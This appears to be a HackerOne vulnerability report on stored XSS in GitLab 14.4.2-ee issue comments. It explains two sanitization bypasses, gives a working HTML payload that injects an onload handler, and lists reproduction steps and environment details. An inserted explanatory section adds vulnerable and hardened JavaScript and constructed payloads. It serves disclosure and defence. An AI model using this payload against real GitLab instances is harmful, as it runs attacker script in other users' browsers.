Stored XSS on issue comments and other pages which contain notes
HackerOne report #1398305 by jarij
on 2021-11-11, assigned to @nmalcolm:
Report
Summary
This report contains two XSS sanitization bypasses:

- The `SyntaxHighlightFilter` creates HTML from unsanitized data. This can be used to bypass the XSS filter on the server side.

```ruby
def highlight_node(node)
  ...
  sourcepos = node.parent.attr('data-sourcepos')
  ...
  sourcepos_attr = sourcepos ? "data-sourcepos=\"#{sourcepos}\"" : ""
  highlighted = %(<pre #{sourcepos_attr} class="#{css_classes}"
                  lang="#{language}"
                  #{lang_params}
                  v-pre="true"><code>#{code}</code></pre>)
```

- The `gl-emoji` custom element can be used to bypass the gitlab-ui `v-safe-html` directive sanitization on the frontend side by injecting the payload into the name attribute:

```javascript
export function emojiImageTag(name, src) {
  return `<img class="emoji" title=":${name}:" alt=":${name}:" src="${src}" width="20" height="20" align="absmiddle" />`;
}
```

- GitLab SaaS is not vulnerable because this report does not include a CSP bypass. I'm currently working on this.
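Both findings above are the same bug class: an attribute value is spliced into an HTML string by template interpolation, so a double quote inside the value ends the attribute and whatever follows is parsed as further attributes. The block below is an added example, not GitLab's code and not the reporter's: `preTagVulnerable` is a JavaScript stand-in for the Ruby `highlight_node` excerpt, `emojiImageTagVulnerable` is the quoted frontend function, and each sits next to a hardened form. The `escapeAttr` helper, the emoji-name pattern, the `attributeNames` tokenizer and the two payload strings are this example's own assumptions and constructed inputs.

```javascript
// Added example (not GitLab's code). Two interpolation sites from the report,
// each beside an attribute-context fix. Helper names, the escaping function,
// the emoji-name allow-list and the payloads are assumptions for the demo.

// Escape the characters that can terminate or alter a double-quoted attribute.
function escapeAttr(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;');
}

// JavaScript stand-in for the Ruby highlight_node excerpt: sourcepos is copied
// verbatim into the <pre> tag. `code` is assumed to be highlighter output that
// is already HTML-escaped, as it is in the filter.
function preTagVulnerable(sourcepos, language, code) {
  const sourceposAttr = sourcepos ? `data-sourcepos="${sourcepos}"` : '';
  return `<pre ${sourceposAttr} class="code highlight" lang="${language}" v-pre="true"><code>${code}</code></pre>`;
}

// Hardened form: every interpolated attribute value goes through escapeAttr,
// so a quote inside sourcepos stays inside the attribute.
function preTagHardened(sourcepos, language, code) {
  const sourceposAttr = sourcepos ? `data-sourcepos="${escapeAttr(sourcepos)}"` : '';
  return `<pre ${sourceposAttr} class="code highlight" lang="${escapeAttr(language)}" v-pre="true"><code>${code}</code></pre>`;
}

// The frontend function as quoted in the report (`export` dropped so the block
// runs as a plain script).
function emojiImageTagVulnerable(name, src) {
  return `<img class="emoji" title=":${name}:" alt=":${name}:" src="${src}" width="20" height="20" align="absmiddle" />`;
}

// Hardened form: emoji names are a closed vocabulary, so reject anything that is
// not a plain shortcode (assumed pattern) and escape every interpolation anyway,
// so the function stays safe if the allow-list is later loosened.
const EMOJI_NAME_RE = /^[a-z0-9_+-]+$/;
function emojiImageTagHardened(name, src) {
  if (!EMOJI_NAME_RE.test(name)) {
    throw new Error(`invalid emoji name: ${JSON.stringify(name)}`);
  }
  const n = escapeAttr(name);
  return `<img class="emoji" title=":${n}:" alt=":${n}:" src="${escapeAttr(src)}" width="20" height="20" align="absmiddle" />`;
}

// Lists the attribute names of the first tag in `html`, split the way a browser
// would split them. Demo tokenizer only, not an HTML parser: it makes visible
// that the injected onload is a real attribute in the vulnerable output and
// stays inside a quoted value in the hardened one.
function attributeNames(html) {
  const openTag = html.slice(1, html.indexOf('>'));
  const rest = openTag.slice(openTag.indexOf(' ') + 1);
  const attr = /([^\s=\/"']+)(?:\s*=\s*(?:"[^"]*"|'[^']*'|[^\s>]+))?/g;
  const names = [];
  let m;
  while ((m = attr.exec(rest)) !== null) names.push(m[1].toLowerCase());
  return names;
}

// Constructed payloads in the shape of the report's: a quote closes the
// attribute and an onload handler follows it.
const SOURCEPOS_PAYLOAD = '" onload="alert(document.location.href)';
const EMOJI_PAYLOAD = '"x="y" onload="alert(document.location.href)"';

console.log('vulnerable pre :', attributeNames(preTagVulnerable(SOURCEPOS_PAYLOAD, 'ruby', 'puts 1')));
console.log('hardened pre   :', attributeNames(preTagHardened(SOURCEPOS_PAYLOAD, 'ruby', 'puts 1')));
console.log('vulnerable img :', attributeNames(emojiImageTagVulnerable(EMOJI_PAYLOAD, '/e.png')));
try {
  emojiImageTagHardened(EMOJI_PAYLOAD, '/e.png');
} catch (e) {
  console.log('hardened img   :', e.message);
}
```

The escaping fix is the general one for any value that ends up in an attribute; the allow-list is the stronger fix where the value has a known shape, which is why the emoji case uses both. Note that a substring check such as `includes('onload=')` cannot tell the two pre outputs apart, since the escaped value still contains that text; the check has to be at the attribute level, as `attributeNames` does.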
Steps to reproduce

- Launch a self-managed GitLab instance
- Create an issue
- Copy and paste the following payload into the comment field:

```html
<pre data-sourcepos="" href="x"></pre>
<gl-emoji data-name='"x="y" onload="alert(document.location.href)"' data-unicode-version='x'>
abc
</gl-emoji>
<pre x="">
<code></code></pre>
```
Results of GitLab environment info
### gitlab-rake gitlab:env:info

```text
System information
System:
Proxy:            no
Current User:     git
Using RVM:        no
Ruby Version:     2.7.4p191
Gem Version:      3.1.4
Bundler Version:  2.1.4
Rake Version:     13.0.6
Redis Version:    6.0.16
Git Version:      2.33.0
Sidekiq Version:  6.2.2
Go Version:       unknown

GitLab information
Version:          14.4.2-ee
Revision:         84aa6daaffd
Directory:        /opt/gitlab/embedded/service/gitlab-rails
DB Adapter:       PostgreSQL
DB Version:       12.7
URL:              http://localhost:8888
HTTP Clone URL:   http://localhost:8888/some-group/some-project.git
SSH Clone URL:    git@localhost:some-group/some-project.git
Elasticsearch:    no
Geo:              no
Using LDAP:       no
Using Omniauth:   yes
Omniauth Providers:

GitLab Shell
Version:          13.21.1
Repository storage paths:
- default:        /var/opt/gitlab/git-data/repositories
GitLab Shell path: /opt/gitlab/embedded/service/gitlab-shell
Git:              /opt/gitlab/embedded/bin/git
```
Impact

An attacker who can comment on an issue will be able to XSS users who visit that issue. This also affects other pages where comments can be posted, such as snippets.
Attachments
Warning: Attachments received through HackerOne, please exercise caution!
How To Reproduce
Please add reproducibility information to this section: